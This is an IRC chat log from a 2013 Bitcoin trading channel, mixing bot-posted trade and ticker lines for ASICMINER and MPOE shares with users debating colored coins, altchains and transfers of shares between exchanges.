BTC [-] May 24 23:14:35 [BTCTC] [ASICMINER-PT] 10 @ 2.432001 = 24.32 BTC [-] May 24 23:14:38 [BTCTC] [ASICMINER-PT] 1 @ 2.432 BTC [-] May 24 23:14:44 [BTCTC] [ASICMINER-PT] 1 @ 2.431003 BTC [-] May 24 23:14:46 [BTCTC] [ASICMINER-PT] 1 @ 2.431002 BTC [-] May 24 23:14:48 [BTCTC] [ASICMINER-PT] 1 @ 2.431001 BTC [-] May 24 23:14:50 [BTCTC] [ASICMINER-PT] 12 @ 2.431 = 29.172 BTC [-] May 24 23:14:51 [BTCTC] [ASICMINER-PT] 3 @ 2.43 = 7.29 BTC [-] May 24 23:15:07 [BTCTC] [BASIC-MINING] 1 @ 0.61 BTC [+] May 24 23:16:03 [BTCTC] [ASICMINER-PT] 1 @ 2.390201 BTC [-] May 24 23:16:30 [BTCTC] [ASICMINER-PT] 7 @ 2.3902 = 16.7314 BTC [-] May 24 23:16:32 [BTCTC] [TAT.ASICMINER] 20 @ 0.025419 = 0.5084 BTC [-] May 24 23:18:03 this arklan dude is some reseller? May 24 23:18:11 ah i see in topic May 24 23:18:11 nvm May 24 23:19:57 next stop: BTCUSD $1337 May 24 23:20:40 ;;ticker May 24 23:20:41 BTCUSD ticker | Best bid: 132.02437, Best ask: 132.37998, Bid-ask spread: 0.35561, Last trade: 132.37999, 24 hour volume: 42001.81799218, 24 hour low: 125.12102, 24 hour high: 133.98000, 24 hour vwap: 129.44076 May 24 23:20:58 Just remove 2. from best ask and you're virtually there. May 24 23:21:31 lol May 24 23:21:44 mircea_popescu sending you a pm real quick May 24 23:21:50 ye May 24 23:22:10 naked pics? May 24 23:22:38 ;;google internet story May 24 23:22:39 Internet Story - Official Video - YouTube: ; Internet Story on Vimeo: ; Internet Story (2010) - IMDb: May 24 23:22:41 aww May 24 23:22:56 lmfao May 24 23:23:02 i saw it May 24 23:23:09 "<3 mircea" May 24 23:23:21 and some eastern european titties May 24 23:23:29 fine ones at that May 24 23:24:49 [MPEX] [S.MPOE] 5944 @ 0.00072037 = 4.2819 BTC [+] May 24 23:24:51 [MPEX] [S.MPOE] 5456 @ 0.00072103 = 3.9339 BTC [+] May 24 23:25:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.024905 BTC [-] May 24 23:25:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.024905 BTC [-] May 24 23:26:02 they're american titties. May 24 23:26:27 well, perhaps shot in america, but they are probably from the ukraine May 24 23:27:20 [BTCTC] [ASICMINER-PT] 6 @ 2.395 = 14.37 BTC [+] May 24 23:27:22 [BTCTC] [ASICMINER-PT] 1 @ 2.390201 BTC [-] May 24 23:27:24 [BTCTC] [ASICMINER-PT] 8 @ 2.3902 = 19.1216 BTC [-] May 24 23:27:26 [BTCTC] [ASICMINER-PT] 1 @ 2.352 BTC [-] May 24 23:27:27 [BTCTC] [ASICMINER-PT] 2 @ 2.351 = 4.702 BTC [-] May 24 23:27:29 [BTCTC] [ASICMINER-PT] 7 @ 2.35 = 16.45 BTC [-] May 24 23:27:53 [BTCTC] [COGNITIVE] 1 @ 0.322 BTC [+] May 24 23:27:54 [BTCTC] [ASICMINER-PT] 6 @ 2.35 = 14.1 BTC [-] May 24 23:28:15 [BTCTC] [ASICMINER-PT] 1 @ 2.464999 BTC [+] May 24 23:28:16 [BTCTC] [TAT.ASICMINER] 49 @ 0.024905 = 1.2203 BTC [-] May 24 23:28:20 [BTCTC] [TAT.ASICMINER] 7 @ 0.024904 = 0.1743 BTC [-] May 24 23:28:22 [BTCTC] [TAT.ASICMINER] 11 @ 0.024903 = 0.2739 BTC [-] May 24 23:28:23 [BTCTC] [TAT.ASICMINER] 33 @ 0.024901 = 0.8217 BTC [-] May 24 23:28:36 [BTCTC] [ASICMINER-PT] 1 @ 2.464999 BTC [+] May 24 23:28:45 [BTCTC] [ASICMINER-PT] 1 @ 2.3301 BTC [-] May 24 23:28:48 [BTCTC] [TAT.ASICMINER] 11 @ 0.024901 = 0.2739 BTC [-] May 24 23:28:50 [BTCTC] [ASICMINER-PT] 2 @ 2.33 = 4.66 BTC [-] May 24 23:29:08 interesting, that was 1 purchase of 1PT offset by sale of 100 100PT shares May 24 23:29:15 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [+] May 24 23:29:31 AM TANKING May 24 23:29:46 panic! May 24 23:29:51 woohoo May 24 23:29:53 DUMP DUMP DUMP! May 24 23:30:00 really stupid actually May 24 23:30:03 if that was the same person May 24 23:30:25 his 100PT shares were cheaper, even considering the 5% tribute to TAT May 24 23:30:31 If I were to dump, I'd do it on a Tuesday May 24 23:30:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.024801 BTC [-] May 24 23:30:51 [BTCTC] [TAT.ASICMINER] 5 @ 0.0248 = 0.124 BTC [-] May 24 23:30:53 [BTCTC] [TAT.ASICMINER] 22 @ 0.024752 = 0.5445 BTC [-] May 24 23:30:55 [BTCTC] [TAT.ASICMINER] 80 @ 0.02475 = 1.98 BTC [-] May 24 23:30:59 but I don't have any shares right now :) May 24 23:31:11 aknap3: why tuesday May 24 23:31:13 prices seem to be generally lower on Fri/Sat May 24 23:31:19 and Higher Mon/Tue May 24 23:31:24 interesting May 24 23:31:27 fiat500: full of hope for divs May 24 23:31:38 hope fetches higher prices than reality May 24 23:31:41 also why I like calls so much May 24 23:31:41 [BTCTC] [S.DICE-PT] 12 @ 0.00315 = 0.0378 BTC [-] May 24 23:31:54 divs are just silly May 24 23:32:08 also, BTC/USD is up May 24 23:32:12 and some want to capitalize May 24 23:32:19 i mean, its going to take 6 months worth of divs to make an amount equivalent to what ive made simply due to appreciation May 24 23:32:24 that'll cause a temporery dip May 24 23:32:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.024601 = 0.1476 BTC [-] May 24 23:32:30 [BTCTC] [TAT.ASICMINER] 31 @ 0.024601 = 0.7626 BTC [-] May 24 23:32:41 then when BTC/USD drops, bunch of cheaply gained BTC enters the market and buys wrecklessly May 24 23:32:47 so selling before divs is a great idea assuming theres panic buying before May 24 23:33:18 it kind of gets real quite immediately before divs May 24 23:33:20 aknap3: thats actually more likely once the ASICS reach mainstream May 24 23:33:23 looking forward to it May 24 23:33:23 so you have to time it right May 24 23:33:26 also, May 24 23:33:34 this can all be thrown out the window, May 24 23:33:34 [BTCTC] [ASICMINER-PT] 1 @ 2.463 BTC [-] May 24 23:34:00 dpending on when friedcat processes xfers to exchanges May 24 23:34:09 heh May 24 23:34:12 which are not predictable May 24 23:34:13 that's the black swan May 24 23:34:35 mp, I hadn't seen that internet story video. Very, very cool, thanks for sharing. May 24 23:34:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.0246 BTC [-] May 24 23:35:01 lmfao May 24 23:36:19 [BTCTC] [TAT.ASICMINER] 7 @ 0.0245 = 0.1715 BTC [-] May 24 23:36:57 [BTCTC] [ASICMINER-PT] 1 @ 2.464999 BTC [+] May 24 23:37:54 [BTCTC] [TAT.ASICMINER] 34 @ 0.02442 = 0.8303 BTC [-] May 24 23:38:34 [BTCTC] [ASICMINER-PT] 1 @ 2.483999 BTC [+] May 24 23:39:11 interesting that all this movement is on BTCT but HI is quiet May 24 23:39:24 anyone here trade on havelock? May 24 23:39:40 I have an account there. tried it once. May 24 23:39:55 TAT seems to like the issuer interface May 24 23:40:49 I think the setup for transfering between there and mpex has great potential, actually a model that should be copied May 24 23:40:57 :) May 24 23:40:58 thanks May 24 23:41:09 <-- i run havelock May 24 23:41:21 topace: didn't think you were paying attention :) May 24 23:41:45 for my own trading, I don't use it because I prefer to play options May 24 23:42:32 i glance here from time to time May 24 23:42:33 :) May 24 23:42:58 but I'd be there all the time otherwise -- plus, I'm Canadian May 24 23:43:37 [MPEX] [S.MPOE] 24016 @ 0.00072103 = 17.3163 BTC [+] May 24 23:43:39 [MPEX] [S.MPOE] 18600 @ 0.0007215 = 13.4199 BTC [+] May 24 23:43:54 [MPEX] [S.MPOE] 13200 @ 0.00072276 = 9.5404 BTC [+] May 24 23:43:54 [MPEX] [S.MPOE] 9950 @ 0.0007231 = 7.1948 BTC [+] May 24 23:44:02 [MPEX] [S.MPOE] 7661 @ 0.00072464 = 5.5515 BTC [+] May 24 23:44:04 hehe well, options might be coming soon (tm) to a havelock investments near you! May 24 23:44:38 cool May 24 23:46:18 [BTCTC] [TAT.ASICMINER] 50 @ 0.02515 = 1.2575 BTC [+] May 24 23:48:48 ;;bc,stats May 24 23:48:49 Current Blocks: 237741 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 146 blocks | Next Difficulty In About: 21 hours, 6 minutes, and 30 seconds | Next Difficulty Estimate: 12044374.8897 | Estimated Percent Change: 7.66155 May 24 23:49:33 topace: cool, thinking of moving some coins to trade there May 24 23:49:39 That's a petty change... May 24 23:51:34 good thing i didnt bother with difficulty futures :P May 24 23:51:46 [BTCTC] [TAT.ASICMINER] 100 @ 0.025 = 2.5 BTC [-] May 24 23:52:11 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 24 23:52:39 [BTCTC] [TAT.ASICMINER] 2 @ 0.02515 = 0.0503 BTC [+] May 24 23:53:30 ;;estimate May 24 23:53:31 Next difficulty estimate | 12046750.2718 based on data since last change | 12915013.3734 based on data for last three days May 24 23:54:35 Fascinating. This has been an announcement about an observation of no relatable quality. May 24 23:56:35 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] May 24 23:56:56 ;;next May 24 23:56:56 targets: 140-145, 160-166, 178-188 | support: 128-130 | #bitcoin [Fri, 24 May 2013 18:24:11 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 2 hours, 32 minutes, and 45 seconds ago May 24 23:57:08 hohohoooo May 24 23:59:23 [BTCTC] [ASICMINER-PT] 1 @ 2.420002 BTC [-] May 24 23:59:43 [BTCTC] [BASIC-MINING] 1 @ 0.605001 BTC [-] May 25 00:03:18 [BTCTC] [BASIC-MINING] 2 @ 0.605 = 1.21 BTC [-] May 25 00:03:21 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [-] May 25 00:08:11 [BTCTC] [ASICMINER-PT] 3 @ 2.43 = 7.29 BTC [+] May 25 00:08:47 [BTCTC] [ASICMINER-PT] 1 @ 2.4779 BTC [+] May 25 00:11:00 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [-] May 25 00:11:02 [BTCTC] [ASICMINER-PT] 1 @ 2.477994 BTC [+] May 25 00:11:03 [BTCTC] [ASICMINER-PT] 3 @ 2.477995 = 7.434 BTC [+] May 25 00:14:14 [BTCTC] [BITVPS] 71 @ 0.000857 = 0.0608 BTC [-] May 25 00:14:16 [BTCTC] [TAT.ASICMINER] 28 @ 0.025149 = 0.7042 BTC [-] May 25 00:15:32 2000 new shares on BTCTC, lol May 25 00:16:02 [HAVELOCK] [ASICM] 4 @ 0.025 = 0.1 BTC [-] May 25 00:16:17 ouch May 25 00:17:11 [BTCTC] [TAT.ASICMINER] 6 @ 0.025149 = 0.1509 BTC [-] May 25 00:17:37 that explains the selloff earlier May 25 00:19:53 [BTCTC] [TAT.ASICMINER] 4 @ 0.0247 = 0.0988 BTC [-] May 25 00:21:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.025 BTC [+] May 25 00:22:53 [BTCTC] [TAT.ASICMINER] 35 @ 0.024999 = 0.875 BTC [-] May 25 00:22:55 [BTCTC] [ASICMINER-PT] 1 @ 2.4745 BTC [-] May 25 00:22:55 [BTCTC] [ASICMINER-PT] 2 @ 2.4311 = 4.8622 BTC [-] May 25 00:23:01 [BTCTC] [ASICMINER-PT] 1 @ 2.431 BTC [-] May 25 00:23:28 ThickAsThieves: aha, and explains the lack of movement elsewhere May 25 00:23:32 thanks for pointing it out May 25 00:23:49 [BTCTC] [ASICMINER-PT] 1 @ 2.441 BTC [+] May 25 00:23:57 [BTCTC] [ASICMINER-PT] 1 @ 2.431101 BTC [-] May 25 00:23:58 [BTCTC] [BASIC-MINING] 1 @ 0.5885 BTC [-] May 25 00:24:00 [BTCTC] [ASICMINER-PT] 1 @ 2.430001 BTC [-] May 25 00:24:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.024999 = 0.075 BTC [-] May 25 00:24:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.02451 = 1.2255 BTC [-] May 25 00:24:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.0245 = 0.098 BTC [-] May 25 00:24:20 [BTCTC] [TAT.ASICMINER] 26 @ 0.02442 = 0.6349 BTC [-] May 25 00:24:39 [BTCTC] [ASICMINER-PT] 1 @ 2.431 BTC [+] May 25 00:24:41 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] May 25 00:25:13 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] May 25 00:25:33 [BTCTC] [ASICMINER-PT] 1 @ 2.4745 BTC [+] May 25 00:25:52 [BTCTC] [ASICMINER-PT] 3 @ 2.44 = 7.32 BTC [-] May 25 00:26:01 [HAVELOCK] [ASICM] 106 @ 0.0247 = 2.6182 BTC [-] May 25 00:26:02 [HAVELOCK] [ASICM] 190 @ 0.0244 = 4.636 BTC [-] May 25 00:26:04 [HAVELOCK] [ASICM] 4 @ 0.0243 = 0.0972 BTC [-] May 25 00:26:13 [BTCTC] [ASICMINER-PT] 1 @ 2.4748 BTC [+] May 25 00:26:15 [BTCTC] [ASICMINER-PT] 1 @ 2.4749 BTC [+] May 25 00:27:06 I'm glad that worked for you inhies May 25 00:34:02 [HAVELOCK] [HIM] 3 @ 2.5 = 7.5 BTC [+] May 25 00:37:02 [HAVELOCK] [VTX] 29 @ 0.443 = 12.847 BTC [-] May 25 00:40:01 [HAVELOCK] [HIM] 1 @ 2.5001 BTC [+] May 25 00:40:42 [BTCTC] [ASICMINER-PT] 1 @ 2.47198 BTC [-] May 25 00:40:44 [BTCTC] [ASICMINER-PT] 1 @ 2.471988 BTC [+] May 25 00:40:46 [BTCTC] [ASICMINER-PT] 1 @ 2.472 BTC [+] May 25 00:40:47 [BTCTC] [ASICMINER-PT] 1 @ 2.4749 BTC [+] May 25 00:41:02 [HAVELOCK] [HIM] 1 @ 2.599 BTC [+] May 25 00:41:15 [BTCTC] [ASICMINER-PT] 1 @ 2.471979 BTC [-] May 25 00:41:59 [BTCTC] [S.MPOE-PT] 1 @ 0.00075 BTC [+] May 25 00:42:15 [BTCTC] [ASICMINER-PT] 4 @ 2.4749 = 9.8996 BTC [+] May 25 00:43:02 [HAVELOCK] [ASICM] 120 @ 0.0245 = 2.94 BTC [+] May 25 00:44:22 [BTCTC] [ASICMINER-PT] 5 @ 2.475 = 12.375 BTC [+] May 25 00:48:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.024998 BTC [+] May 25 00:50:18 question: is there anything preventing the creation of a transaction for 0 BTC, but with a miner fee so that it would pickup up? May 25 00:54:21 the reason i ask is that all the passthru nonsense seems so cumbersome - seems to me like you could use the block chain to move shares around, no? May 25 00:54:40 Colored coins? May 25 00:54:55 the passthrough makes it easier to trade on an exchange May 25 00:54:59 [BTCTC] [COGNITIVE] 3 @ 0.335 = 1.005 BTC [+] May 25 00:55:32 but they're not fungible May 25 00:57:12 why not imbed them in the blockchain in the comments field - seems to me that it could be done pretty easily so your shares could exist in your wallet and could be moved to where you want May 25 00:57:50 provided, of course, that every agrees on a format for such a comments May 25 00:59:33 23:50.17 ( pgp ) question: is there anything preventing the creation of a transaction for 0 BTC, < yes, with 0.8xx theres a min set... cant have txes smaller than i dont remember howmany satoshi May 25 01:02:34 pgp: some of them are fungible May 25 01:03:12 yes, but you have to push the shares, requires someone to do it for you, etc May 25 01:03:16 blockchain is not the most efficient data structure for this kind of stuff May 25 01:03:22 when you are distributing dividends etc May 25 01:03:33 pgp i actually stumbled upon similar txs May 25 01:03:40 some outputs were 0 May 25 01:04:05 seems to me that you could use the blockchain for lots of stuff besides BTC May 25 01:04:32 but if there is a min quantity, that's a problem May 25 01:04:41 pgp 0tx are nonstandard May 25 01:04:45 [BTCTC] [TAT.ASICMINER] 3 @ 0.024799 = 0.0744 BTC [-] May 25 01:04:47 (meaning they won't get picked up) May 25 01:04:53 yeah you could use it to communicate video data if you want but its not an efficient way to do it May 25 01:04:58 even with a miner fee? May 25 01:05:03 as to the blockchain shares, it's called colored coins. it has it's own problems May 25 01:05:11 ;;google why i nixed jazz May 25 01:05:12 Why I nixed p2p, colored coins and all that jazz pe Trilema - Un blog ...: ; Why King County nixed woman's marriage to a corporation in ...: ; The five spot: Where can I see real jazz played in town? | Las Vegas (1 more message) May 25 01:05:30 it's not a matter of miner fees. nonstandard tx are not relayed. May 25 01:05:37 pgp, for sharing big data in blockchain-esqe way, there's freenetproject May 25 01:05:58 but to decentralize the ledgering of othe assets seems like an intersting application May 25 01:05:59 ut as it has limited capacity, it forgets unused files May 25 01:07:14 you did read trilema treatise on the decentralized exchanges? May 25 01:08:01 [HAVELOCK] [ASICM] 2 @ 0.02430001 = 0.0486 BTC [-] May 25 01:08:09 so i think yes the ownership can and will be tracked by some blockchain mechanism May 25 01:08:18 but markets will stay centralized May 25 01:09:01 [HAVELOCK] [ASICM] 56 @ 0.0243 = 1.3608 BTC [-] May 25 01:09:03 I did not read the trilema article about decentralized exchanges - link? May 25 01:09:31 [00:05] just below ;;google why i nixed jazz May 25 01:10:02 [HAVELOCK] [ASICM] 25 @ 0.0243 = 0.6075 BTC [-] May 25 01:11:02 [HAVELOCK] [ASICM] 1 @ 0.024272 BTC [-] May 25 01:12:01 [HAVELOCK] [ASICM] 16 @ 0.02400001 = 0.384 BTC [-] May 25 01:12:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0026 BTC [-] May 25 01:13:13 yeah, so what about it? May 25 01:14:02 [HAVELOCK] [ASICM] 107 @ 0.02400001 = 2.568 BTC [-] May 25 01:14:37 I'm refering to a idea about moving asset custody. For example, why not have a mechnism "like" the blockchain to move ASICM to whatever exchange you want. May 25 01:14:49 or keep it in you own wallet May 25 01:15:08 exchanges have no incentive to implement that May 25 01:15:15 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] May 25 01:15:37 but an issuer would May 25 01:15:55 public ledger would make divs a breeze May 25 01:16:02 [HAVELOCK] [ASICM] 25 @ 0.0241 = 0.6025 BTC [+] May 25 01:16:03 [HAVELOCK] [ASICM] 50 @ 0.0242 = 1.21 BTC [+] May 25 01:16:11 [BTCTC] [TAT.ASICMINER] 46 @ 0.024799 = 1.1408 BTC [+] May 25 01:17:01 it's a bad idea. May 25 01:17:02 [HAVELOCK] [ASICM] 23 @ 0.0245 = 0.5635 BTC [+] May 25 01:17:14 [BTCTC] [TAT.ASICMINER] 16 @ 0.0248 = 0.3968 BTC [+] May 25 01:17:19 are you a bit biased? May 25 01:17:27 ;/ May 25 01:17:34 Problem 0 May 25 01:17:42 you know this is diosxcussed in the article you apparently don't want to read. May 25 01:17:53 [BTCTC] [ASICMINER-PT] 1 @ 2.450001 BTC [-] May 25 01:18:02 [HAVELOCK] [ASICM] 202 @ 0.0245 = 4.949 BTC [+] May 25 01:18:12 I read it - what are you specifically referring to? May 25 01:18:23 problem 0? May 25 01:18:28 [00:17] Problem 0 May 25 01:19:03 that i am not biased, but in a perfect position to implement it May 25 01:19:07 if it actually were a good idea. May 25 01:19:08 it's not. May 25 01:19:59 I'll still argue that you're stuck, though, mp. Colored coins in the BTC blockchain may not work, but nothing prevents an alternate chain, tailored to the needs of an asset market, to evolve. Thinking in terms of what is possible or conceivable now is limiting. May 25 01:20:13 *from evolving. May 25 01:20:16 that's not the objection. May 25 01:20:27 the objection is that this thing wouldn't actually add any benefit. May 25 01:20:56 what is meant by colored coins? May 25 01:21:10 creating some special coins which denote ownership of shares. May 25 01:22:02 [HAVELOCK] [ASICM] 6 @ 0.024 = 0.144 BTC [-] May 25 01:22:02 It would add benefit if it could solve problems that an asset market has or will get. May 25 01:22:03 [HAVELOCK] [ASICM] 4 @ 0.0243 = 0.0972 BTC [+] May 25 01:22:04 [HAVELOCK] [ASICM] 60 @ 0.0242 = 1.452 BTC [-] May 25 01:22:04 [HAVELOCK] [ASICM] 10 @ 0.0241 = 0.241 BTC [-] May 25 01:22:05 [HAVELOCK] [ASICM] 16 @ 0.02400002 = 0.384 BTC [-] May 25 01:22:13 furuknap such as ? May 25 01:22:28 [BTCTC] [ASICMINER-PT] 1 @ 2.476999 BTC [+] May 25 01:22:30 [BTCTC] [ASICMINER-PT] 1 @ 2.477 BTC [+] May 25 01:22:34 [BTCTC] [ASICMINER-PT] 8 @ 2.477795 = 19.8224 BTC [+] May 25 01:22:36 We may not see that right now, but none of us saw in 2008 what problems Bitcoin would solve either. Otherwise, we'd be called Satoshi Nakamoto. May 25 01:23:06 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 25 01:23:14 no, actually i saw the problems May 25 01:23:18 what i didn't see was the solution May 25 01:23:22 not even by a long shot. May 25 01:23:35 That's one of the things that fascinate me with cryptocurrencies; it allows us to explore (and in altcoin land, test) new ideas for working with values. May 25 01:23:55 but sure, in general speaking the world is not complete so you never know. May 25 01:23:56 [BTCTC] [COGNITIVE] 10 @ 0.35 = 3.5 BTC [+] May 25 01:25:30 OK, so here's one problem that current asset market doesn't solve. Insider trading or what we consider unethical price manipulation, legal or otherwise. I don't have a solution, but a BTC-based or derived system may bring forth ideas that could control or somehow reverse illegal actions, as defined by whatever jurisdiction. May 25 01:25:46 [BTCTC] [ASICMINER-PT] 1 @ 2.4511 BTC [+] May 25 01:25:48 [BTCTC] [ASICMINER-PT] 1 @ 2.451001 BTC [-] May 25 01:25:52 [BTCTC] [ASICMINER-PT] 1 @ 2.451 BTC [-] May 25 01:26:32 reverse ? May 25 01:26:48 you want a reversible altchain ? May 25 01:27:19 I don't know, that's the point. If I had the solution, I would tell you, honestly :-) May 25 01:27:30 well supposedly colored coins are the solution May 25 01:27:38 what we're looking for is a conceivable problem they might solve. May 25 01:27:57 For instance, again not particularly thought out, bans on shares held by denoted key insiders before or during important events. A deadlock on trades with those shares could reverse the trade (to be declared to the buyer) if breach of whatever happened. May 25 01:28:56 you'd never know the insider handles. kinda the point of crypto currency May 25 01:29:06 Would it somehow allow a failed exchange to transfer shares to another? Or is that not even an issue? May 25 01:29:25 Again, now you're thinking in BTC mode. May 25 01:29:27 [BTCTC] [BITVPS] 4 @ 0.000857 = 0.0034 BTC [-] May 25 01:29:32 Or an owner of assets on a failed exchange, I should say. May 25 01:29:58 TomServo well i don't see how it'd do better than what's currently in place atm May 25 01:30:03 (see bitvps transfer) May 25 01:30:55 [BTCTC] [ASICMINER-PT] 7 @ 2.45 = 17.15 BTC [-] May 25 01:31:19 not much difference between failed (dead) altcoin and failed exchange May 25 01:31:24 I will take a look. Honestly, I don't know much other than it sounds like the glbse closure was a fuckshow. May 25 01:32:28 [BTCTC] [PAJKA.BOND] 1 @ 0.1071 BTC [+] May 25 01:33:22 Has anyone else noticed that BTCTC could easily stand for BTC Trash Can? May 25 01:33:41 how charitable May 25 01:33:56 TomServo bitvps was transferred off mpex May 25 01:34:00 mircea_popescu: I didn't realize bitvps was listed on mpex originally. Why the transfer? May 25 01:34:15 list of holder gpg keys encrypted with owner's key publioshed on btctalk May 25 01:34:40 http://trilema.com/2013/sbvps-delisting-notice/ May 25 01:35:04 and https://bitcointalk.org/index.php?topic=76506.msg1531701#msg1531701 for the actual thing. May 25 01:35:19 unlike the horrorshow of glbse etc emails, this is the actual standard i'd say. May 25 01:35:44 [MPEX] [S.MPOE] 3100 @ 0.00072373 = 2.2436 BTC [-] May 25 01:37:32 hey mp do you have mpex upgrade/revampl plans for the next few months posted on your blog i could read about? May 25 01:37:50 um May 25 01:38:14 http://trilema.com/2013/so-whats-the-plan-with-mpoempex/ May 25 01:38:17 that's about it. May 25 01:38:34 thank you :) May 25 01:38:38 [MPEX] [S.MPOE] 6518 @ 0.00072453 = 4.7225 BTC [+] May 25 01:38:39 [MPEX] [S.MPOE] 6301 @ 0.00072464 = 4.566 BTC [+] May 25 01:38:50 [MPEX] [S.MPOE] 6317 @ 0.00072539 = 4.5823 BTC [+] May 25 01:38:52 [MPEX] [S.MPOE] 7914 @ 0.00072567 = 5.743 BTC [+] May 25 01:39:31 ahh back from feb, not much changing from that? May 25 01:39:35 !ticker m s.mpoe May 25 01:39:36 [MPEX:S.MPOE] 1D: 0.00070412 / 0.00071388 / 0.00072567 (472070 shares, 337.00 BTC), 7D: 0.00065751 / 0.00069026 / 0.00072567 (3441360 shares, 2,375.45 BTC), 30D: 0.00064 / 0.0006983 / 0.00076528 (10796515 shares, 7,539.21 BTC) May 25 01:39:49 pgp: "I'm refering to a idea about moving asset custody. For example, why not have a mechnism "like" the blockchain to move ASICM to whatever exchange you want." this sounds a lot like ripple May 25 01:40:47 BitHub only been a few months. plans for years. May 25 01:41:08 ok - so - why are "colored coins" such a bad idea? I am not suggesting any sort of p2p exchange, just ledgering and the ability to trade you shares on differenet exchanges. May 25 01:41:25 any new ipo's coming up? May 25 01:41:36 ripple is flawed May 25 01:42:02 but their consensus engine does seem interesting May 25 01:42:34 just analysing what i should do with the mpoe stock May 25 01:42:39 the problem is that shares on one exchange have different value than shares on another exchange May 25 01:42:55 mostly because of variance in counterparty risk May 25 01:43:02 i would actually like to sign up and use it, something different from BF and btct May 25 01:43:14 BitHub yes, actually. May 25 01:43:14 but don't think its really suited for me atm May 25 01:43:38 pgp for one, you will have the normal confirmation delay. for the other, how do you pay the miners ? May 25 01:43:45 cool May 25 01:43:49 for the yet another, how do you pay the devs May 25 01:45:03 i really miss glbse May 25 01:45:43 yes, but let's look at how it work for financial markets. I can hold a stock certificate in my name (personal wallet), or I can deposit with my broker and put it in "street" name (broker's wallet and trade it on an exchange - ANY exchange - in the US that would mean 7 major exchanges, but 20 or so dark pools. Every share is identical and fungible. May 25 01:45:58 right May 25 01:46:09 BitHub why ? May 25 01:46:11 I don't care about delay, just the ability to move it May 25 01:46:22 pgp: I think opentransactions might be the thing you're looking for. May 25 01:46:35 is that thing still actively tinkered on ? May 25 01:46:47 idont know it just exciting when it first was around May 25 01:47:12 pgp afaik these days stock certs are mostly digital May 25 01:47:23 you can "own" it but in the terms of, some clearance corp saying so and that's all there is. May 25 01:47:39 nobody wants to administer the physical stuff anymore, too expensive, forgeries etc May 25 01:47:49 [BTCTC] [ASICMINER-PT] 1 @ 2.4749 BTC [+] May 25 01:47:52 [BTCTC] [ASICMINER-PT] 1 @ 2.477794 BTC [+] May 25 01:48:02 mircea_popescu: you asking if open-transactions is being tinkered on/ May 25 01:48:06 yea May 25 01:48:13 https://bitcointalk.org/index.php?topic=212490.0;all May 25 01:48:14 i recall looking at it early 2012 or so May 25 01:48:15 that was pretty recent May 25 01:48:20 and compelling May 25 01:48:20 even sponsoring it a little. May 25 01:48:22 what if exchanges agreed to allow users from one exchange to exchange the same shares with another user on another asset exchange May 25 01:48:28 but, it never seemed to go very far for some reason. May 25 01:48:46 BitHub htye already do, for pretty much all mpex shares May 25 01:48:51 you can trade the pt to the share and back May 25 01:48:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.0248 = 0.0744 BTC [+] May 25 01:48:57 [BTCTC] [TAT.ASICMINER] 6 @ 0.024997 = 0.15 BTC [+] May 25 01:49:03 [HAVELOCK] [HIM] 1 @ 2.55000001 BTC [-] May 25 01:49:16 nice May 25 01:49:20 i see May 25 01:50:32 some mpex BF intergration would be sweet May 25 01:50:40 btw, you most certainly can request a stock certificate at any time - hassle and not common - but people do it for many reasons May 25 01:51:24 digital stock cert could be linked to a qr code or something <--n00b at this stuff May 25 01:51:59 but having some sort of non exchange controlled mechanism to prove, for example, that there are no conterfiet share out there, seems like a worthy goal May 25 01:52:41 the mpex dividend actually tests for this May 25 01:52:50 a public ledger May 25 01:52:56 as it won't push out div if the share count is > the declared count May 25 01:53:01 or anonymous addresses May 25 01:53:08 blockchain May 25 01:53:16 or really, an altchain May 25 01:53:25 listen, an altchain is not trustworthy in pricniple. May 25 01:53:30 *of* anonymous addresses May 25 01:53:33 it only becomes trustworthy if very much used. May 25 01:53:35 tons of mining May 25 01:53:36 etc. May 25 01:54:01 this fetish people have for blockchains is being exploited atm by all the altchain scams. May 25 01:54:27 fact is an altchain is trustworthy just for being an altchain to the same degree that written text can be trusted just for being written on paper. May 25 01:54:37 paper will take anything, the blockchain idea will take anything. May 25 01:54:51 BF mpex intergration example, i could have an account at bf and mpex and buy shares from bf and transfer it to mpex for a fee, both exchanges share the fee. Now i can trade my sdice shares on mpex, vice versa May 25 01:55:14 ahhbitraage May 25 01:55:52 BitHub people; actually do this already May 25 01:55:57 i dont recall whio's running the hf pt. May 25 01:56:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.024997 = 0.05 BTC [+] May 25 01:56:03 [HAVELOCK] [ASICM] 10 @ 0.0244 = 0.244 BTC [+] May 25 01:56:19 true? i would love to understand it May 25 01:56:35 [BTCTC] [COGNITIVE] 1 @ 0.36 BTC [+] May 25 01:56:36 [BTCTC] [COGNITIVE] 7 @ 0.36 = 2.52 BTC [+] May 25 01:58:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.024997 = 0.125 BTC [+] May 25 01:58:18 ore just see more seamless intergration between btct, mpex, havelock, BF May 25 01:59:33 ok - so the sort of thing that is possible today is much like ADR and ordinary shares. They are convertible for a fee, they trade on different exchange, and it's a hassle to convert. May 25 02:00:00 but it the only solution for dealing with DIFFERENT base currencies... May 25 02:00:24 BTC assets are the same currency, but same hassle? why? May 25 02:00:59 because mpex uses strong ownership May 25 02:01:01 [HAVELOCK] 